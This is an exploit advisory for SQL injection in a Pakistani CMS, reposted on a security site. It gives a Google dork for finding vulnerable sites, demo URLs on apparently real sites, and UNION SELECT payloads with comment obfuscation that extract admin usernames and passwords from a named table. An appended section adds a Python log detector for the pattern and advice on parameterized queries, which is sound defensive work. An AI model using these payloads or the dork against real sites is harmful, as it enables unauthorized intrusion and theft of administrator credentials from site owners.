DL TECH CMS SQL Injection

2013.05.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

===================================================================================
Exploit Title: DL TECH CMS SQL Injection
===================================================================================
# Google Dork: site:.pk intext:"Designed & Developed By: DL TECH" inurl:".php?"
===================================================================================
# Exploit Author: Ashiyane Digital Security Team
===================================================================================
# Vendor Homepage: http://dltech.pk/
===================================================================================
# Tested On : All versions
===================================================================================
# Demo1 : http://lonXve.com.pk/basket.php?sizeid=0&qty=1&Pid=180'
# Demo2 : http://arXlan.pk/products.php?MID=1&SID=22'
# Demo3 : http://floXk/products.php?MID=2&SID=34'
===================================================================================
# Example :
http://fteXm.pk/about.php?id=-s'+/*!50000union*/+select+1,2,/*!(usrname)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ftedbs.tbl_admin--+
http://fteXm.pk/about.php?id=-s'+/*!50000union*/+select+1,2,/*!(password)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ftedbs.tbl_admin--+
===================================================================================
# Injection Help : Important Table Is 'tbl_admin' And Columns Are 'usrname' AND 'password'
===================================================================================
# contact me : injectable@rogers.com
InJecTable Was Here ... Hamedan Bax !
===================================================================================
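
Added example (not part of the original advisory): a Python check for web access logs that flags the request pattern shown above. It unwraps MySQL executable comments such as /*!50000union*/ before matching, because a keyword hidden inside one slips past a plain "union select" filter. Treating the parameters seen in the advisory's URLs as integer-only is an assumption; the host example.test and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that carry integer values in the advisory's URLs (assumed integer-only).
NUMERIC_PARAMS = {"id", "mid", "sid", "pid", "sizeid", "qty"}

# MySQL executes the body of /*! ... */ and /*!NNNNN ... */ comments, so a
# filter that treats them as ordinary comments misses the keyword inside.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(\s+(all|distinct))?\s+select\b", re.I)


def normalize(value: str) -> str:
    """Unwrap executable comments, drop ordinary ones, collapse whitespace."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()


def inspect_url(url: str) -> list[str]:
    """Return findings for one request URL; an empty list means clean."""
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalize(raw)
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.append(f"{name}: non-numeric value")
        if UNION_SELECT.search(value):
            findings.append(f"{name}: UNION SELECT after comment unwrapping")
    return findings


# Constructed sample requests (example.test is a placeholder host).
SAMPLES = [
    "http://example.test/products.php?MID=1&SID=22",
    "http://example.test/products.php?MID=1&SID=22'",
    "http://example.test/about.php?id=-1'+/*!50000union*/+select+1,2,3--+",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", inspect_url(url) or "clean")
```

On the application side, the matching fix is to cast these parameters to integers and pass them to the database through parameterized queries.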



Copyright 2024, cxsecurity.com
